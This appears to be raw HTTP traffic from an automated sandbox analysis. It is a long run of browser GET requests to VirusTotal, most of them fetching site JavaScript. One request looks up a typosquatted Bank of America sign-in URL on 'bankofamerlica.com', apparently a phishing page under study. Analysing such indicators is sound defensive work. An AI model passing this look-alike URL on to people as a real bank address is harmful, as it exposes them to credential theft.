Source: global traffic	HTTP traffic detected: GET /gui/66587.25f73431adda110b0a5d.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/25924.b3a6356de76617e73c99.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/56053.5e8324e3c0b62ad10cdf.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/32827.e9df234ac022e0ec6707.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/26044.08a4c6e2ccb49f01ee08.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/64630.e2a960dcb01f67dbff23.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/47031.059aa26916e6bb9fe21d.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/78957.ea8ee0f875d66c314a07.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/38347.39b249624b673f165512.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/59084.21fce51b78aa667002e8.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/18625.a9391a24a36c52803ea8.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /ui/search?limit=20&relationships%5Bcomment%5D=author%2Citem&query=https%3A%2F%2Fonline.access.secure.bankofamerlica.com%2Flogin%2Fsign-in%2FsignOnV2Screen.go HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/33274.0c0f27619a6630c5840a.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /ui/urls HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/84569.39d023e39066ad66391e.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/26044.08a4c6e2ccb49f01ee08.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/66583.c5f0908478a0e216aae6.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/64630.e2a960dcb01f67dbff23.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/81735.0c559957aa77895a80b6.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/78957.ea8ee0f875d66c314a07.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/13420.518b81a36f626bfebc81.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/18625.a9391a24a36c52803ea8.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/11806.d81fcce120eb3a4dc377.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/38347.39b249624b673f165512.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/33274.0c0f27619a6630c5840a.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/66583.c5f0908478a0e216aae6.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/84569.39d023e39066ad66391e.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/63143.b5130a91280bec20fe15.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/75927.802a112711bbd5680929.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/51452.65d2fafed16a04e8c3fc.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/81735.0c559957aa77895a80b6.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/36018.11aa4f9261da1e45e451.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/53819.2a1d6d2aed818366d95f.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/27197.598dbd3bfe6cc1efe979.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/13420.518b81a36f626bfebc81.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/11806.d81fcce120eb3a4dc377.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/63143.b5130a91280bec20fe15.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/54237.a01175962f63b15c8aae.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/75927.802a112711bbd5680929.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/2119.c23c584763439c660ad5.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
